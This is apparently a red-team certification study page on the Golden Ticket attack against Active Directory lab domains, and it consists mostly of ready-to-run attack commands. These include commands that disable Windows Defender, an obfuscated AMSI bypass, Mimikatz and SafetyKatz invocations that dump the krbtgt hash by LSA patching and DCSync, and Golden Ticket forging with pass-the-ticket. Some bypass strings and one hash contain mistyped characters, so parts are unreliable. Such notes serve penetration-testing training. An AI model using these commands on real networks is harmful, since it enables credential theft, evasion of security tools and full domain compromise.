CRTE Certified Red Team Expert
HomeCertifications
  • Certified Red Team Expert (CRTE)
  • Exam Info
    • Reviews and Notes
    • Nikhil Mittal Videos
    • Course Content
  • 1️⃣Active Directory Enumeration
    • Objectives Description
  • 2️⃣Local Privilege Escalation
    • Description
  • 3️⃣Offensive .NET and PowerShell Tradecraft
    • Description
  • 4️⃣Domain Privilege Escalation
    • Description
    • LAPS
    • RBCD -
  • Lateral Movement
    • Description
  • Domain Dominance & Persistence
    • Description
    • Silver Ticket
    • Golden Ticket
    • Skeleton Key
    • Diamond Ticket
  • Cross Domain Attacks
    • ✅Description
    • 🟢Shadow Credentials
    • 🟢AD CS
  • Cross Forest Attacks
    • Description
    • 🟢Kerberoast
    • 🟢SID Abuse
    • 🟢AbusingPAM Trust
  • Defenses
    • Description
  • Detection & Detection Bypasses
    • Description
  • Deception
    • Description
Powered by GitBook
On this page
  • Invoke-Mimikatz
  • Disable Defender [ Important ]
  • AMSI bypass [ Important ]
  • Execute mimikatz on DC as DA to get krbtgt hash
  • Create a ticket on any machine [ "pass the ticket" attack]
  • List Kerberos services available
  • To use the DCSync feature for getting krbtg hash execute the below command with DA privileges
  • Binaries
  • Using SafetyKatz
  • On a machine which can reach the DC over network (Need elevation):

Was this helpful?

  1. Domain Dominance & Persistence

Golden Ticket

Invoke-Mimikatz

Disable Defender [ Important ]

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

AMSI bypass [ Important ]

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{O}"-F'F', 'rE' ) ) 3; ( GeT-VariaBle ( "1Q2U" + "zX" )  -VaL_s+)."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{@}{5}" -f'Util', 'A', 'Amsi','.Management.', 'utomation.','s', 'System' ))."g`etf`iE1D"( ( "{O}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{O}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Execute mimikatz on DC as DA to get krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

Create a ticket on any machine [ "pass the ticket" attack]

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

List Kerberos services available

klist

To use the DCSync feature for getting krbtg hash execute the below command with DA privileges

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the target DC

Binaries

Using SafetyKatz

C:\Users\Public\SafetyKatz.exe "lsadump::lsa /patch" "exit" 
or
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"

On a machine which can reach the DC over network (Need elevation):

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

PreviousSilver TicketNextSkeleton Key

Last updated 1 year ago

Was this helpful?